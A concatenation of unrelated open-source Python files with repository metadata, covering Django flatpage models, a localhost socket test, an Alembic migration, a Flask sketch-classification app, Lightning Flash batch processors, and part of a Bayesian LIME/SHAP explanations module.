633d051ca8647623adbab746c9da9153f46e1e8f
|
[
"BSD-3-Clause"
] | null | null | null |
cargo/flatpages/models.py
|
dalou/django-cargo
|
633d051ca8647623adbab746c9da9153f46e1e8f
|
[
"BSD-3-Clause"
] | null | null | null |
# encoding: utf-8
import re
from django.db import models
from django.utils.html import strip_tags
from django.core.urlresolvers import reverse
from django.utils.text import slugify
from cargo.fields import HTMLField
# from taggit_autosuggest.managers import TaggableManager as AutosuggestTaggableManager
class FlatPagePosition(models.Model):
flatpage = models.ForeignKey("cargo.FlatPage", verbose_name="Page statique", related_name="positions")
PLACEMENT_HEADER = 'HEADER'
PLACEMENT_FOOTER = 'FOOTER'
PLACEMENT_CHOICES = (
(PLACEMENT_HEADER, u"Haut de page"),
(PLACEMENT_FOOTER, u"Pied de page"),
)
placement = models.CharField("Position", max_length=254, choices=PLACEMENT_CHOICES, default=PLACEMENT_FOOTER)
order = models.PositiveIntegerField(u"Ordre d'affichage", default=1)
order_col = models.PositiveIntegerField(u"Ordre Colonne", blank=True, null=True)
is_active = models.BooleanField(default=True, verbose_name=u"Activée ?")
class Meta:
abstract = True
verbose_name = u"Position d'un lien de page statique"
verbose_name_plural = u"Positions des page statique"
        ordering = ('placement', 'order_col', 'order')
class FlatPage(models.Model):
created_date = models.DateTimeField(u"Date created", auto_now_add=True)
updated_date = models.DateTimeField(u"Date updated", auto_now=True, db_index=True)
title = models.CharField(u"Titre", max_length=254)
link_name = models.CharField(u"Nom du lien", max_length=254, blank=True, null=True)
LINK_TYPE_PAGE = "PAGE"
LINK_TYPE_APP = "APP"
LINK_TYPE_EXTERNAL = "EXTERNAL"
LINK_TYPE_CHOICES = (
(LINK_TYPE_PAGE, u"Page HTML"),
(LINK_TYPE_APP, u"Page interne existante"),
(LINK_TYPE_EXTERNAL, u"Page externe"),
)
link_type = models.CharField(u"Type de page", max_length=254, choices=LINK_TYPE_CHOICES, default=LINK_TYPE_PAGE)
link_value = models.CharField(u"URL", max_length=254, blank=True, null=True)
meta_title = models.CharField(u"Meta - Titre", max_length=254, blank=True, null=True)
meta_description = models.CharField(u"Meta - Description", max_length=254, blank=True, null=True)
# tags = AutosuggestTaggableManager(verbose_name="Tags", help_text=u"Séparez par une virgule ou utilisez la touche tabulation.", related_name="CARGO_flatpages", blank=True)
content = HTMLField(u"Contenu", blank=True)
is_active = models.BooleanField(default=True, verbose_name=u"Activée ?")
slug = models.CharField(u"Url de la page", max_length=254, default="", blank=True, help_text=u"auto générée, ne changer que si conflits d'url")
class Meta:
abstract = True
verbose_name = u"Page statique"
verbose_name_plural = u"Pages statiques"
ordering = ('title', )
@models.permalink
def get_absolute_url(self):
return ('flatpage:view', (), {'slug': self.slug })
def get_url(self):
if self.link_value:
if self.link_type == FlatPage.LINK_TYPE_APP:
if self.link_value.find(':') != -1:
return reverse(self.link_value)
else:
return self.link_value
elif self.link_type == FlatPage.LINK_TYPE_EXTERNAL:
                if not (self.link_value.startswith('http://') or
                        self.link_value.startswith('https://')):
                    self.link_value = "http://" + self.link_value
return self.link_value
else:
return self.get_absolute_url()
# return reverse(*reverse_url)
    def get_tags(self):
        # relies on the ``tags`` field above (currently commented out)
        return [tag.strip() for tag in re.split(r"[\|,:;#!\.\-_]+", self.tags)]
def __unicode__(self):
return self.title
def save(self, **kwargs):
if not self.slug or self.slug.strip().strip('/') == "":
self.slug = slugify(self.title)
self.slug = "/".join([ slugify(slug) for slug in self.slug.split('/') ])
if self.slug.strip('/').startswith('admin'):
self.slug = self.slug.replace('admin', '__admin')
if not self.link_name and self.title:
self.link_name = self.title
super(FlatPage, self).save(**kwargs)
class FlatPageSettings(models.Model):
class Meta:
abstract = True
verbose_name = u"Paramètre"
verbose_name_plural = u"Paramètres"
def __unicode__(self):
return u"Paramètres"
    def save(self, *args, **kwargs):
        # singleton pattern: keep at most one settings row per concrete subclass
        cls = type(self)
        if cls.objects.count():
            cls.objects.first().delete()
        super(FlatPageSettings, self).save(*args, **kwargs)
    @classmethod
    def get_settings(cls):
        settings = cls.objects.first()
        if not settings:
            settings = cls()
            settings.save()
        return settings
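# A hedged usage sketch: the models above are abstract, so a project is expected to
# subclass them concretely (hypothetical app code):
#
#   class SiteFlatPage(FlatPage):
#       class Meta(FlatPage.Meta):
#           abstract = False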
| 36.709924
| 176
| 0.653358
|
1172ec2ad7a3db87a8ebe3c1d5d53c5c778aec71
| 375
|
py
|
Python
|
_test.py
|
Politraf/politraf
|
d6b04fa7f2a3e88861ef38a6e8ff0cb4ae4e67b7
|
[
"MIT"
] | 6
|
2017-07-31T09:03:41.000Z
|
2019-03-30T18:50:04.000Z
|
_test.py
|
Politraf/politraf
|
d6b04fa7f2a3e88861ef38a6e8ff0cb4ae4e67b7
|
[
"MIT"
] | 84
|
2018-06-07T15:43:13.000Z
|
2022-01-26T16:48:46.000Z
|
_test.py
|
Politraf/politraf
|
d6b04fa7f2a3e88861ef38a6e8ff0cb4ae4e67b7
|
[
"MIT"
] | 2
|
2018-03-07T12:38:30.000Z
|
2020-01-13T00:30:48.000Z
|
import pytest
import socket as s
@pytest.fixture
def socket(request):
_socket = s.socket(s.AF_INET, s.SOCK_STREAM)
def socket_teardown():
_socket.close()
request.addfinalizer(socket_teardown)
return _socket
def test_server_connect(socket):
    socket.connect(('127.0.0.1', 8123))
    assert socket
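# Note: this test assumes a server is already listening on 127.0.0.1:8123;
# run with, e.g.:
#   pytest _test.py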
| 19.736842
| 48
| 0.693333
|
e9611b542dceed66be0e4e38695d19efa982940c
| 645
|
py
|
Python
|
app/migrations/versions/d73af147c118_create_tokens_table.py
|
Basselbi/hikma-health-backend
|
0f891821a04aa103fff62097443bd585bc342dbc
|
[
"MIT"
] | null | null | null |
app/migrations/versions/d73af147c118_create_tokens_table.py
|
Basselbi/hikma-health-backend
|
0f891821a04aa103fff62097443bd585bc342dbc
|
[
"MIT"
] | null | null | null |
app/migrations/versions/d73af147c118_create_tokens_table.py
|
Basselbi/hikma-health-backend
|
0f891821a04aa103fff62097443bd585bc342dbc
|
[
"MIT"
] | null | null | null |
"""create_tokens_table
Revision ID: d73af147c118
Revises: fc3a6a2ca002
Create Date: 2020-04-29 11:05:20.619408
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd73af147c118'
down_revision = 'fc3a6a2ca002'
branch_labels = None
depends_on = None
def upgrade():
op.execute("""
CREATE TABLE tokens (
user_id uuid REFERENCES users (id),
token text not null,
expiry timestamptz not null default now() + INTERVAL '60 minutes'
);
""")
op.execute('CREATE INDEX ON tokens (token)')
def downgrade():
op.execute(
'''DROP TABLE tokens;'''
)
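# Standard Alembic CLI usage for this revision (assumes a configured alembic.ini):
#   alembic upgrade d73af147c118
#   alembic downgrade fc3a6a2ca002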
| 18.970588
| 71
| 0.677519
|
d3f0ecd29f4757f51cc048a87cf2c664fdd66807
| 4,358
|
py
|
Python
|
Flictionary-Flask/app.py
|
datascisteven/Flictionary
|
54cd31df185b7ea7fdfefebe5e211abde143319d
|
[
"MIT"
] | null | null | null |
Flictionary-Flask/app.py
|
datascisteven/Flictionary
|
54cd31df185b7ea7fdfefebe5e211abde143319d
|
[
"MIT"
] | null | null | null |
Flictionary-Flask/app.py
|
datascisteven/Flictionary
|
54cd31df185b7ea7fdfefebe5e211abde143319d
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template
import numpy as np
import tensorflow as tf
from PIL import Image
import base64
from io import BytesIO
import cv2
import os
import json
import random
import matplotlib
matplotlib.use('Agg')
import plotly
import plotly.graph_objs as go
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
# import image processing
from image_utils import crop_image, normalize_image, convert_to_rgb, convert_to_np
# Dictionary with label codes
label_dict = {0:'ant', 1:'bat', 2:'bear', 3:'bee', 4:'butterfly',
5:'camel', 6:'cat', 7:'cow', 8:'crab', 9:'crocodile',
10:'dog', 11:'dolphin', 12:'dragon', 13:'duck', 14:'elephant',
15:'flamingo', 16:'frog', 17:'giraffe', 18:'hedgehog', 19:'horse',
20:'kangaroo', 21:'lion', 22:'lobster', 23:'monkey', 24:'mosquito',
25:'mouse', 26:'octopus', 27:'owl', 28:'panda', 29:'parrot',
30:'penguin', 31:'pig', 32:'rabbit', 33:'raccoon', 34:'rhinoceros',
35:'scorpion', 36:'sea turtle', 37:'shark', 38:'sheep', 39:'snail',
40:'snake', 41:'spider', 42:'squirrel', 43:'swan', 44:'tiger',
45:'whale', 46:'zebra'}
def animal_picker():
    # label_dict has keys 0..46; randint is inclusive on both ends
    random_key = random.randint(0, 46)
random_animal = label_dict[random_key]
return random_animal, random_key
def loading_model(filepath='model/model_h5.h5'):
print("Loading model from {} \n".format(filepath))
model = load_model(filepath)
graph = tf.compat.v1.get_default_graph()
return model, graph
def make_prediction(model, input):
input = cv2.resize(input, (96, 96))
img_array = img_to_array(input)
img_array = np.expand_dims(img_array, 0)
preds = model.predict(img_array)[0]
ind = (-preds).argsort()[:10]
top_10_animals = [label_dict[x] for x in ind]
label = ind[0]
label_name = top_10_animals[0]
preds.sort()
top_10_values = preds[::-1][:10]
return label, label_name, ind, preds, top_10_animals, top_10_values
app = Flask(__name__)
# load model
model, graph = loading_model()
@app.route('/')
@app.route('/index')
def index():
random_animal, random_key = animal_picker()
return render_template('index.html', random_animal=random_animal)
@app.route('/go/<dataURL>')
def pred(dataURL):
# decode base64 '._-' -> '+/='
dataURL = dataURL.replace('.', '+')
dataURL = dataURL.replace('_', '/')
dataURL = dataURL.replace('-', '=')
# get the base64 string and convert string to bytes
image_b64_str = dataURL
byte_data = base64.b64decode(image_b64_str)
image_data = BytesIO(byte_data)
# open Image with PIL and convert image
img = Image.open(image_data)
img = img.convert("RGBA")
image_cropped = crop_image(img)
image_normalized = normalize_image(image_cropped)
img_rgb = convert_to_rgb(image_normalized)
image_np = convert_to_np(img_rgb)
# apply model and print prediction
    label, label_name, ind, preds, top_10_animals, top_10_values = make_prediction(model, image_np)
    print("This is a {}".format(label_name))
# plt.style.use('tableau-colorblind10')
# x = top_10_animals
# y = top_10_values
# sns.barplot(y, x)
# plt.savefig('top10.png')
# create plotly visualization
graphs = [
        # plot with probabilities for the top-10 predicted classes
        {'data': [go.Bar(x = top_10_values[::-1].tolist(),
                         y = top_10_animals[::-1],
                         orientation = 'h')],
'layout': {'title': 'Class Probabilities',
'yaxis': {'title': "Classes"},
'xaxis': {'title': "Probability", }
}
}]
# encode plotly graphs in JSON
ids = ["graph-{}".format(i) for i, _ in enumerate(graphs)]
graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)
    # render the hook.html passing prediction results
    return render_template(
        'hook.html',
        result=label_name,  # predicted class label
        ids=ids,  # plotly graph ids
        graphJSON=graphJSON,  # json plotly graphs
        dataURL=dataURL  # image to display with result
    )
if __name__ == '__main__':
port=int(os.environ.get('PORT', 5000))
app.run(debug=True, host='0.0.0.0', port=port)
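# A hedged note on the dataURL handling in ``pred``: the client is assumed to
# substitute the base64 characters '+', '/', '=' with '.', '_', '-' so the payload
# survives inside a URL path segment; ``pred`` reverses that mapping before decoding.
# Illustrative client-side encoding:
#   encoded = (base64.b64encode(png_bytes).decode()
#              .replace('+', '.').replace('/', '_').replace('=', '-'))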
| 34.314961
| 98
| 0.637907
|
dd0ed1e9ddc6fdf8569494a1124bc591d5ca68cf
| 14,653
|
py
|
Python
|
flash/core/data/batch.py
|
LoopGlitch26/lightning-flash
|
a1bece4361a7cb5449715bef9975696e96c5f9ae
|
[
"Apache-2.0"
] | null | null | null |
flash/core/data/batch.py
|
LoopGlitch26/lightning-flash
|
a1bece4361a7cb5449715bef9975696e96c5f9ae
|
[
"Apache-2.0"
] | null | null | null |
flash/core/data/batch.py
|
LoopGlitch26/lightning-flash
|
a1bece4361a7cb5449715bef9975696e96c5f9ae
|
[
"Apache-2.0"
] | 1
|
2021-07-14T09:17:46.000Z
|
2021-07-14T09:17:46.000Z
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, TYPE_CHECKING, Union
import torch
from pytorch_lightning.trainer.states import RunningStage
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from torch import Tensor
from flash.core.data.callback import ControlFlow
from flash.core.data.data_source import DefaultDataKeys
from flash.core.data.utils import (
_contains_any_tensor,
convert_to_modules,
CurrentFuncContext,
CurrentRunningStageContext,
)
if TYPE_CHECKING:
from flash.core.data.process import Deserializer, Preprocess, Serializer
class _Sequential(torch.nn.Module):
"""This class is used to chain 3 functions together for the _Preprocessor ``per_sample_transform`` function.
1. ``pre_tensor_transform``
2. ``to_tensor_transform``
3. ``post_tensor_transform``
"""
def __init__(
self,
preprocess: "Preprocess",
pre_tensor_transform: Optional[Callable],
to_tensor_transform: Optional[Callable],
post_tensor_transform: Callable,
stage: RunningStage,
assert_contains_tensor: bool = False,
):
super().__init__()
self.preprocess = preprocess
self.callback = ControlFlow(self.preprocess.callbacks)
self.pre_tensor_transform = convert_to_modules(pre_tensor_transform)
self.to_tensor_transform = convert_to_modules(to_tensor_transform)
self.post_tensor_transform = convert_to_modules(post_tensor_transform)
self.stage = stage
self.assert_contains_tensor = assert_contains_tensor
self._current_stage_context = CurrentRunningStageContext(stage, preprocess, reset=False)
self._pre_tensor_transform_context = CurrentFuncContext("pre_tensor_transform", preprocess)
self._to_tensor_transform_context = CurrentFuncContext("to_tensor_transform", preprocess)
self._post_tensor_transform_context = CurrentFuncContext("post_tensor_transform", preprocess)
def forward(self, sample: Any) -> Any:
self.callback.on_load_sample(sample, self.stage)
with self._current_stage_context:
if self.pre_tensor_transform is not None:
with self._pre_tensor_transform_context:
sample = self.pre_tensor_transform(sample)
self.callback.on_pre_tensor_transform(sample, self.stage)
if self.to_tensor_transform is not None:
with self._to_tensor_transform_context:
sample = self.to_tensor_transform(sample)
self.callback.on_to_tensor_transform(sample, self.stage)
if self.assert_contains_tensor:
if not _contains_any_tensor(sample):
raise MisconfigurationException(
"When ``to_tensor_transform`` is overriden, "
"``DataPipeline`` expects the outputs to be ``tensors``"
)
with self._post_tensor_transform_context:
sample = self.post_tensor_transform(sample)
self.callback.on_post_tensor_transform(sample, self.stage)
return sample
def __str__(self) -> str:
return (
f"{self.__class__.__name__}:\n"
f"\t(pre_tensor_transform): {str(self.pre_tensor_transform)}\n"
f"\t(to_tensor_transform): {str(self.to_tensor_transform)}\n"
f"\t(post_tensor_transform): {str(self.post_tensor_transform)}\n"
f"\t(assert_contains_tensor): {str(self.assert_contains_tensor)}\n"
f"\t(stage): {str(self.stage)}"
)
class _DeserializeProcessor(torch.nn.Module):
def __init__(
self,
deserializer: "Deserializer",
preprocess: "Preprocess",
pre_tensor_transform: Callable,
to_tensor_transform: Callable,
):
super().__init__()
self.preprocess = preprocess
self.callback = ControlFlow(self.preprocess.callbacks)
self.deserializer = convert_to_modules(deserializer)
self.pre_tensor_transform = convert_to_modules(pre_tensor_transform)
self.to_tensor_transform = convert_to_modules(to_tensor_transform)
self._current_stage_context = CurrentRunningStageContext(RunningStage.PREDICTING, preprocess, reset=False)
self._pre_tensor_transform_context = CurrentFuncContext("pre_tensor_transform", preprocess)
self._to_tensor_transform_context = CurrentFuncContext("to_tensor_transform", preprocess)
def forward(self, sample: str):
sample = self.deserializer(sample)
with self._current_stage_context:
with self._pre_tensor_transform_context:
sample = self.pre_tensor_transform(sample)
self.callback.on_pre_tensor_transform(sample, RunningStage.PREDICTING)
with self._to_tensor_transform_context:
sample = self.to_tensor_transform(sample)
self.callback.on_to_tensor_transform(sample, RunningStage.PREDICTING)
return sample
class _SerializeProcessor(torch.nn.Module):
def __init__(
self,
serializer: "Serializer",
):
super().__init__()
self.serializer = convert_to_modules(serializer)
def forward(self, sample):
return self.serializer(sample)
class _Preprocessor(torch.nn.Module):
"""
    This class is used to encapsulate the following functions of a Preprocess Object:
Inside a worker:
per_sample_transform: Function to transform an individual sample
    Inside a worker, it is actually made up of 3 functions:
* pre_tensor_transform
* to_tensor_transform
* post_tensor_transform
collate: Function to merge sample into a batch
per_batch_transform: Function to transform an individual batch
* per_batch_transform
Inside main process:
per_sample_transform: Function to transform an individual sample
* per_sample_transform_on_device
collate: Function to merge sample into a batch
per_batch_transform: Function to transform an individual batch
* per_batch_transform_on_device
"""
def __init__(
self,
preprocess: "Preprocess",
collate_fn: Callable,
per_sample_transform: Union[Callable, _Sequential],
per_batch_transform: Callable,
stage: RunningStage,
apply_per_sample_transform: bool = True,
on_device: bool = False,
):
super().__init__()
self.preprocess = preprocess
self.callback = ControlFlow(self.preprocess.callbacks)
self.collate_fn = convert_to_modules(collate_fn)
self.per_sample_transform = convert_to_modules(per_sample_transform)
self.per_batch_transform = convert_to_modules(per_batch_transform)
self.apply_per_sample_transform = apply_per_sample_transform
self.stage = stage
self.on_device = on_device
        extension = "_on_device" if self.on_device else ""
self._current_stage_context = CurrentRunningStageContext(stage, preprocess)
self._per_sample_transform_context = CurrentFuncContext(f"per_sample_transform{extension}", preprocess)
self._collate_context = CurrentFuncContext("collate", preprocess)
self._per_batch_transform_context = CurrentFuncContext(f"per_batch_transform{extension}", preprocess)
@staticmethod
def _extract_metadata(
samples: List[Dict[str, Any]],
) -> Tuple[List[Dict[str, Any]], Optional[List[Dict[str, Any]]]]:
metadata = [s.pop(DefaultDataKeys.METADATA, None) if isinstance(s, Mapping) else None for s in samples]
return samples, metadata if any(m is not None for m in metadata) else None
def forward(self, samples: Sequence[Any]) -> Any:
        # we create a new dict to prevent potential memory leaks,
# assuming that the dictionary samples are stored in between and
# potentially modified before the transforms are applied.
if isinstance(samples, dict):
samples = dict(samples.items())
with self._current_stage_context:
if self.apply_per_sample_transform:
with self._per_sample_transform_context:
_samples = []
if isinstance(samples, Mapping):
samples = [samples]
for sample in samples:
sample = self.per_sample_transform(sample)
if self.on_device:
self.callback.on_per_sample_transform_on_device(sample, self.stage)
_samples.append(sample)
samples = type(_samples)(_samples)
with self._collate_context:
samples, metadata = self._extract_metadata(samples)
try:
samples = self.collate_fn(samples, metadata)
except TypeError:
samples = self.collate_fn(samples)
if metadata and isinstance(samples, dict):
samples[DefaultDataKeys.METADATA] = metadata
self.callback.on_collate(samples, self.stage)
with self._per_batch_transform_context:
samples = self.per_batch_transform(samples)
if self.on_device:
self.callback.on_per_batch_transform_on_device(samples, self.stage)
else:
self.callback.on_per_batch_transform(samples, self.stage)
return samples
def __str__(self) -> str:
# todo: define repr function which would take object and string attributes to be shown
return (
"_Preprocessor:\n"
f"\t(per_sample_transform): {str(self.per_sample_transform)}\n"
f"\t(collate_fn): {str(self.collate_fn)}\n"
f"\t(per_batch_transform): {str(self.per_batch_transform)}\n"
f"\t(apply_per_sample_transform): {str(self.apply_per_sample_transform)}\n"
f"\t(on_device): {str(self.on_device)}\n"
f"\t(stage): {str(self.stage)}"
)
class _Postprocessor(torch.nn.Module):
"""This class is used to encapsultate the following functions of a Postprocess Object:
Inside main process:
per_batch_transform: Function to transform a batch
per_sample_transform: Function to transform an individual sample
uncollate_fn: Function to split a batch into samples
per_sample_transform: Function to transform an individual sample
save_fn: Function to save all data
save_per_sample: Function to save an individual sample
is_serving: Whether the Postprocessor is used in serving mode.
"""
def __init__(
self,
uncollate_fn: Callable,
per_batch_transform: Callable,
per_sample_transform: Callable,
serializer: Optional[Callable],
save_fn: Optional[Callable] = None,
save_per_sample: bool = False,
is_serving: bool = False,
):
super().__init__()
self.uncollate_fn = convert_to_modules(uncollate_fn)
self.per_batch_transform = convert_to_modules(per_batch_transform)
self.per_sample_transform = convert_to_modules(per_sample_transform)
self.serializer = convert_to_modules(serializer)
self.save_fn = convert_to_modules(save_fn)
self.save_per_sample = convert_to_modules(save_per_sample)
self.is_serving = is_serving
@staticmethod
def _extract_metadata(batch: Any) -> Tuple[Any, Optional[Any]]:
metadata = None
if isinstance(batch, Mapping) and DefaultDataKeys.METADATA in batch:
metadata = batch.pop(DefaultDataKeys.METADATA, None)
return batch, metadata
def forward(self, batch: Sequence[Any]):
batch, metadata = self._extract_metadata(batch)
uncollated = self.uncollate_fn(self.per_batch_transform(batch))
if metadata:
for sample, sample_metadata in zip(uncollated, metadata):
sample[DefaultDataKeys.METADATA] = sample_metadata
final_preds = [self.per_sample_transform(sample) for sample in uncollated]
if self.serializer is not None:
final_preds = [self.serializer(sample) for sample in final_preds]
if isinstance(uncollated, Tensor) and isinstance(final_preds[0], Tensor):
final_preds = torch.stack(final_preds)
else:
final_preds = type(final_preds)(final_preds)
if self.save_fn:
if self.save_per_sample:
for pred in final_preds:
self.save_fn(pred)
else:
self.save_fn(final_preds)
return final_preds
def __str__(self) -> str:
return (
"_Postprocessor:\n"
f"\t(per_batch_transform): {str(self.per_batch_transform)}\n"
f"\t(uncollate_fn): {str(self.uncollate_fn)}\n"
f"\t(per_sample_transform): {str(self.per_sample_transform)}\n"
f"\t(serializer): {str(self.serializer)}"
)
def default_uncollate(batch: Any):
"""
This function is used to uncollate a batch into samples.
Examples:
>>> a, b = default_uncollate(torch.rand((2,1)))
"""
batch_type = type(batch)
if isinstance(batch, Tensor):
if len(batch.shape) == 0: # 0 shape tensors
return batch
return list(torch.unbind(batch, 0))
if isinstance(batch, Mapping):
return [batch_type(dict(zip(batch, default_uncollate(t)))) for t in zip(*batch.values())]
if isinstance(batch, tuple) and hasattr(batch, "_fields"): # namedtuple
return [batch_type(*default_uncollate(sample)) for sample in zip(*batch)]
if isinstance(batch, Sequence) and not isinstance(batch, str):
return [default_uncollate(sample) for sample in batch]
return batch
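# A hedged illustration of ``default_uncollate`` on a mapping batch (shapes are
# illustrative only):
#
#   batch = {"input": torch.rand(4, 3), "target": torch.arange(4)}
#   samples = default_uncollate(batch)  # -> list of 4 dicts, one entry per sample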
| 41.044818
| 114
| 0.663823
|
c8114c99003e10df7e3dc4ce84927e81f94dda8e
| 50
|
py
|
Python
|
dscript/models/__init__.py
|
Jin0331/D-SCRIPT
|
4e3ba637b786e80a27c7a67383ebe6989a5bb8f3
|
[
"MIT"
] | null | null | null |
dscript/models/__init__.py
|
Jin0331/D-SCRIPT
|
4e3ba637b786e80a27c7a67383ebe6989a5bb8f3
|
[
"MIT"
] | null | null | null |
dscript/models/__init__.py
|
Jin0331/D-SCRIPT
|
4e3ba637b786e80a27c7a67383ebe6989a5bb8f3
|
[
"MIT"
] | null | null | null |
__all__ = ["contact", "embedding", "interaction"]
| 25
| 49
| 0.68
|
9787b7d17665c97e575c82f2b711b773edf2a517
| 32,769
|
py
|
Python
|
bayes/explanations.py
|
dylan-slack/Modeling-Uncertainty-Local-Explainability
|
a0a9eac08ec987ee3e394676e84e5bd8697c6404
|
[
"MIT"
] | 15
|
2021-10-30T08:28:58.000Z
|
2022-02-25T01:22:37.000Z
|
bayes/explanations.py
|
dylan-slack/Modeling-Uncertainty-Local-Explainability
|
a0a9eac08ec987ee3e394676e84e5bd8697c6404
|
[
"MIT"
] | 2
|
2021-11-01T19:54:06.000Z
|
2022-01-14T18:02:17.000Z
|
bayes/explanations.py
|
dylan-slack/Modeling-Uncertainty-Local-Explainability
|
a0a9eac08ec987ee3e394676e84e5bd8697c6404
|
[
"MIT"
] | 3
|
2021-10-19T20:32:41.000Z
|
2022-02-19T15:45:26.000Z
|
"""Bayesian Local Explanations.
This code implements bayesian local explanations. The code supports the LIME & SHAP
kernels. Along with the LIME & SHAP feature importances, bayesian local explanations
also support uncertainty expression over the feature importances.
"""
import logging
from copy import deepcopy
from functools import reduce
from multiprocessing import Pool
import numpy as np
import operator as op
from tqdm import tqdm
import sklearn
import sklearn.preprocessing
from sklearn.linear_model import Ridge, Lasso
from lime import lime_image, lime_tabular
from bayes.regression import BayesianLinearRegression
LDATA, LINVERSE, LSCALED, LDISTANCES, LY = list(range(5))
SDATA, SINVERSE, SY = list(range(3))
class BayesLocalExplanations:
"""Bayesian Local Explanations.
    This class implements Bayesian local explanations.
"""
def __init__(self,
training_data,
data="image",
kernel="lime",
credible_interval=95,
mode="classification",
categorical_features=[],
discretize_continuous=True,
save_logs=False,
log_file_name="bayes.log",
width=0.75,
verbose=False):
"""Initialize the local explanations.
Arguments:
            training_data: The training data used to initialize the perturbation sampler.
data: The type of data, either "image" or "tabular"
kernel: The kernel to use, either "lime" or "shap"
credible_interval: The % credible interval to use for the feature importance
uncertainty.
mode: Whether to run with classification or regression.
categorical_features: The indices of the categorical features, if in regression mode.
save_logs: Whether to save logs from the run.
log_file_name: The name of log file.
"""
assert kernel in ["lime", "shap"], f"Kernel must be one of lime or shap, not {kernel}"
assert data in ["image", "tabular"], f"Data must be one of image or tabular, not {data}"
assert mode in ["classification"], "Others modes like regression are not implemented"
if save_logs:
logging.basicConfig(filename=log_file_name,
filemode='a',
level=logging.INFO)
logging.info("==============================================")
logging.info("Initializing Bayes%s %s explanations", kernel, data)
logging.info("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
self.cred_int = credible_interval
self.data = data
self.kernel = kernel
self.mode = mode
self.categorical_features = categorical_features
self.discretize_continuous = discretize_continuous
self.verbose = verbose
self.width = width * np.sqrt(training_data.shape[1])
logging.info("Setting mode to %s", mode)
logging.info("Credible interval set to %s", self.cred_int)
if kernel == "shap" and data == "tabular":
logging.info("Setting discretize_continuous to True, due to shapley sampling")
            self.discretize_continuous = True
self.training_data = training_data
self._run_init(training_data)
def _run_init(self, training_data):
if self.kernel == "lime":
lime_tab_exp = lime_tabular.LimeTabularExplainer(training_data,
mode=self.mode,
categorical_features=self.categorical_features,
discretize_continuous=self.discretize_continuous)
self.lime_info = lime_tab_exp
elif self.kernel == "shap":
# Discretization forcibly set to true for shap sampling on initialization
shap_tab_exp = lime_tabular.LimeTabularExplainer(training_data,
mode=self.mode,
categorical_features=self.categorical_features,
discretize_continuous=self.discretize_continuous)
self.shap_info = shap_tab_exp
else:
raise NotImplementedError
def _log_args(self, args):
"""Logs arguments to function."""
logging.info(args)
def _shap_tabular_perturb_n_samples(self,
data,
n_samples,
max_coefs=None):
"""Generates n shap perturbations"""
if max_coefs is None:
max_coefs = np.arange(data.shape[0])
pre_rdata, pre_inverse = self.shap_info._LimeTabularExplainer__data_inverse(data_row=data,
num_samples=n_samples)
rdata = pre_rdata[:, max_coefs]
inverse = np.tile(data, (n_samples, 1))
inverse[:, max_coefs] = pre_inverse[:, max_coefs]
return rdata, inverse
def _lime_tabular_perturb_n_samples(self,
data,
n_samples):
"""Generates n_perturbations for LIME."""
rdata, inverse = self.lime_info._LimeTabularExplainer__data_inverse(data_row=data,
num_samples=n_samples)
scaled_data = (rdata - self.lime_info.scaler.mean_) / self.lime_info.scaler.scale_
distances = sklearn.metrics.pairwise_distances(
scaled_data,
scaled_data[0].reshape(1, -1),
metric='euclidean'
).ravel()
return rdata, inverse, scaled_data, distances
def _stack_tabular_return(self, existing_return, perturb_return):
"""Stacks data from new tabular return to existing return."""
if len(existing_return) == 0:
return perturb_return
new_return = []
for i, item in enumerate(existing_return):
new_return.append(np.concatenate((item, perturb_return[i]), axis=0))
return new_return
def _select_indices_from_data(self, perturb_return, indices, predictions):
"""Gets each element from the perturb return according to indices, then appends the predictions."""
        # Previously had this set to range(4)
temp = [perturb_return[i][indices] for i in range(len(perturb_return))]
temp.append(predictions)
return temp
def shap_tabular_focus_sample(self,
data,
classifier_f,
label,
n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
to_consider=10_000,
                                  temperature=1e-2,
enumerate_initial=True):
"""Focus sample n_samples perturbations for lime tabular."""
assert focus_sample_initial_points > 0, "Initial focusing sample points cannot be <= 0"
current_n_perturbations = 0
# Get 1's coalitions, if requested
if enumerate_initial:
enumerate_init_p = self._enumerate_initial_shap(data)
current_n_perturbations += enumerate_init_p[0].shape[0]
else:
enumerate_init_p = None
if self.verbose:
pbar = tqdm(total=n_samples)
pbar.update(current_n_perturbations)
# Get initial points
if current_n_perturbations < focus_sample_initial_points:
initial_perturbations = self._shap_tabular_perturb_n_samples(data, focus_sample_initial_points - current_n_perturbations)
if enumerate_init_p is not None:
current_perturbations = self._stack_tabular_return(enumerate_init_p, initial_perturbations)
else:
current_perturbations = initial_perturbations
current_n_perturbations += initial_perturbations[0].shape[0]
else:
current_perturbations = enumerate_init_p
current_perturbations = list(current_perturbations)
# Store initial predictions
current_perturbations.append(classifier_f(current_perturbations[SINVERSE])[:, label])
if self.verbose:
pbar.update(initial_perturbations[0].shape[0])
while current_n_perturbations < n_samples:
current_batch_size = min(focus_sample_batch_size, n_samples - current_n_perturbations)
# Init current BLR
blr = BayesianLinearRegression(percent=self.cred_int)
weights = self._get_shap_weights(current_perturbations[SDATA], current_perturbations[SDATA].shape[1])
blr.fit(current_perturbations[SDATA], current_perturbations[-1], weights, compute_creds=False)
candidate_perturbations = self._shap_tabular_perturb_n_samples(data, to_consider)
_, var = blr.predict(candidate_perturbations[SINVERSE])
# Get sampling weighting
            var /= temperature
            exp_var = np.exp(var)
            all_exp = np.sum(exp_var)
            temperature_scaled_weights = exp_var / all_exp
            # Get sampled indices
            least_confident_sample = np.random.choice(len(var), size=current_batch_size, p=temperature_scaled_weights, replace=True)
# Get predictions
cy = classifier_f(candidate_perturbations[SINVERSE][least_confident_sample])[:, label]
new_perturbations = self._select_indices_from_data(candidate_perturbations, least_confident_sample, cy)
current_perturbations = self._stack_tabular_return(current_perturbations, new_perturbations)
